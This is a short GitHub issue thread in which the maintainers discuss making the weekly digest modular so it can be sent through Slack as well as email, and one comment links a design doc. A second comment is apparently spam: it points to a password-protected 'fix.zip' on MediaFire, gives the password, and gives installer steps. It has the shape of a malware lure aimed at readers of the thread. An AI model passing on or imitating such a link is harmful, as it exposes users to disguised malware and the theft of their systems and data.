### ISSUE TITLE
Design alternative digest distribution channel mechanism

### ISSUE THREAD

**Issue by yoavartzi** [lil-lab/recnet#260]
We need to be able to support different digest push mechanism for the weekly digest. Currently we only support email. An immediate example is Slack. 

We should probably refactor the email digest code to make it modular and with a stable interface, so we can register alternative services.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joannechen1223** [comment]
Design Doc: [Notion](https://www.notion.so/Multiple-Distributing-Channels-Slack-Integration-61323d4345c547cb869129e117c5d722)
